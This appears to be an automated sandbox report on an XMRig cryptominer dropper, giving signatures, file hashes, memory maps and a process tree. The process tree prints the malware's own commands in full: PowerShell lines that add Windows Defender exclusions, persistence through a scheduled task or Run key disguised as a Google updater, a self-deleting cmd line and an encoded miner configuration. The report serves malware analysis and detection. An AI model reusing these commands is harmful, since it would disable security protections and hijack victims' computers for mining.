Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1785s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/3JynzWc6LxNCT2y8.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3428
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\3JynzWc6LxNCT2y8.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\3JynzWc6LxNCT2y8.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4256
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\3JynzWc6LxNCT2y8.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1264
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:1124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2032
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
            PID:3472
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4368
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:1308
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          1⤵
            PID:2156
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4112
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:2796
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:1936

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            704KB

            MD5

            7e43cac5bd34dbb2b672cf7479b4f1aa

            SHA1

            fc776e72701ff8acd5ad2d37246087855b89ef4e

            SHA256

            1a69668700e8b13a5069a8e3a6372dcc8f052e35fb293d1a9275d39506388fcc

            SHA512

            6e83f31bb5ba976e14f87b9943f306f1a4fcc1573772a78bcd3f7cd224c078740f4b0d06473d7536eb42f7d03d1784f971b1c51d143e84b2869cbbd38df7ef8d

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            1.1MB

            MD5

            c3ad27d7f373206dfba91bfc4b250d46

            SHA1

            8f26b1df1a7a6f4dcf51d3fe751bd348e3739e79

            SHA256

            e0b70b5a1fd8a5e7b29c34063436c6a50b10e83193e562c1282ee5c4dab72610

            SHA512

            77bf2094ae5f1f45e2115f56ee0548bcc451909dd2ed117873d04a61495ac39b692bed72c754ff103b18123e0e522a244362e4e1deea144e3d4352d8d29a59a2

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            6d3e9c29fe44e90aae6ed30ccf799ca8

            SHA1

            c7974ef72264bbdf13a2793ccf1aed11bc565dce

            SHA256

            2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

            SHA512

            60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e1c18ce9c1062ec022c739908d0c4b77

            SHA1

            635c3d0f4406023d111c886fd6505ac1341ddb9a

            SHA256

            a3e543c5efda1e12391c296096c240514ba3f2e24b2d632b2ae5de977e4bf575

            SHA512

            a55bf02f8d4397c5b7bc9aa556af4467fa30701953209be13eece2272e551202aa91b2c06c73eee3b7ca6cbb59c1f36820d546705947ec13c6223e93b5538644

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e4ani5vk.vla.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1124-80-0x00000203FF9B0000-0x00000203FF9BA000-memory.dmp
            Filesize

            40KB

          • memory/1124-75-0x00007FF4F6D00000-0x00007FF4F6D10000-memory.dmp
            Filesize

            64KB

          • memory/1124-88-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/1124-84-0x00000203FF9F0000-0x00000203FF9FA000-memory.dmp
            Filesize

            40KB

          • memory/1124-81-0x00000203FFA30000-0x00000203FFA4A000-memory.dmp
            Filesize

            104KB

          • memory/1124-82-0x000002039ADA0000-0x000002039ADA8000-memory.dmp
            Filesize

            32KB

          • memory/1124-83-0x000002039ADB0000-0x000002039ADB6000-memory.dmp
            Filesize

            24KB

          • memory/1124-78-0x00000203FF9A0000-0x00000203FF9AA000-memory.dmp
            Filesize

            40KB

          • memory/1124-76-0x00000203985F0000-0x0000020398600000-memory.dmp
            Filesize

            64KB

          • memory/1124-79-0x00000203FFA10000-0x00000203FFA2C000-memory.dmp
            Filesize

            112KB

          • memory/1124-77-0x000002039ABA0000-0x000002039AC55000-memory.dmp
            Filesize

            724KB

          • memory/1124-74-0x000002039AB80000-0x000002039AB9C000-memory.dmp
            Filesize

            112KB

          • memory/1124-85-0x00000203985F0000-0x0000020398600000-memory.dmp
            Filesize

            64KB

          • memory/1124-55-0x00000203985F0000-0x0000020398600000-memory.dmp
            Filesize

            64KB

          • memory/1124-54-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/1264-52-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/1264-47-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/1264-48-0x000001FD7F9D0000-0x000001FD7F9E0000-memory.dmp
            Filesize

            64KB

          • memory/1264-49-0x000001FD7F9D0000-0x000001FD7F9E0000-memory.dmp
            Filesize

            64KB

          • memory/1308-126-0x00007FF66AC50000-0x00007FF66AC66000-memory.dmp
            Filesize

            88KB

          • memory/1308-133-0x00007FF66AC50000-0x00007FF66AC66000-memory.dmp
            Filesize

            88KB

          • memory/2032-113-0x0000023B4B680000-0x0000023B4B690000-memory.dmp
            Filesize

            64KB

          • memory/2032-101-0x0000023B4B680000-0x0000023B4B690000-memory.dmp
            Filesize

            64KB

          • memory/2032-115-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/2032-112-0x0000023B4DB40000-0x0000023B4DBF5000-memory.dmp
            Filesize

            724KB

          • memory/2032-100-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/2032-102-0x0000023B4B680000-0x0000023B4B690000-memory.dmp
            Filesize

            64KB

          • memory/2184-6-0x000002A8373F0000-0x000002A837412000-memory.dmp
            Filesize

            136KB

          • memory/2184-11-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/2184-13-0x000002A8374A0000-0x000002A8374B0000-memory.dmp
            Filesize

            64KB

          • memory/2184-12-0x000002A8374A0000-0x000002A8374B0000-memory.dmp
            Filesize

            64KB

          • memory/2184-16-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/3472-160-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-142-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-188-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-186-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-184-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-182-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-121-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-120-0x000001E0D8090000-0x000001E0D80B0000-memory.dmp
            Filesize

            128KB

          • memory/3472-180-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-178-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-125-0x000001E0D8760000-0x000001E0D8780000-memory.dmp
            Filesize

            128KB

          • memory/3472-176-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-127-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-128-0x000001E0D8780000-0x000001E0D87A0000-memory.dmp
            Filesize

            128KB

          • memory/3472-129-0x000001E0D87A0000-0x000001E0D87C0000-memory.dmp
            Filesize

            128KB

          • memory/3472-131-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-132-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-174-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-134-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-135-0x000001E0D8780000-0x000001E0D87A0000-memory.dmp
            Filesize

            128KB

          • memory/3472-137-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-138-0x000001E0D87A0000-0x000001E0D87C0000-memory.dmp
            Filesize

            128KB

          • memory/3472-140-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-172-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-144-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-146-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-148-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-150-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-152-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-154-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-156-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-158-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-170-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-162-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-164-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-166-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/3472-168-0x00007FF68CF20000-0x00007FF68D714000-memory.dmp
            Filesize

            8.0MB

          • memory/4028-36-0x00007FF7BEF40000-0x00007FF7BF151000-memory.dmp
            Filesize

            2.1MB

          • memory/4028-0-0x00007FF7BEF40000-0x00007FF7BF151000-memory.dmp
            Filesize

            2.1MB

          • memory/4112-53-0x00007FF6B88E0000-0x00007FF6B8AF1000-memory.dmp
            Filesize

            2.1MB

          • memory/4112-119-0x00007FF6B88E0000-0x00007FF6B8AF1000-memory.dmp
            Filesize

            2.1MB

          • memory/4256-27-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/4256-34-0x00007FFF6B170000-0x00007FFF6BC31000-memory.dmp
            Filesize

            10.8MB

          • memory/4256-32-0x0000027FB2DC0000-0x0000027FB2DD0000-memory.dmp
            Filesize

            64KB

          • memory/4256-31-0x0000027FB2DC0000-0x0000027FB2DD0000-memory.dmp
            Filesize

            64KB

          • memory/4256-29-0x0000027FB2DC0000-0x0000027FB2DD0000-memory.dmp
            Filesize

            64KB

          • memory/4256-30-0x0000027FB2DC0000-0x0000027FB2DD0000-memory.dmp
            Filesize

            64KB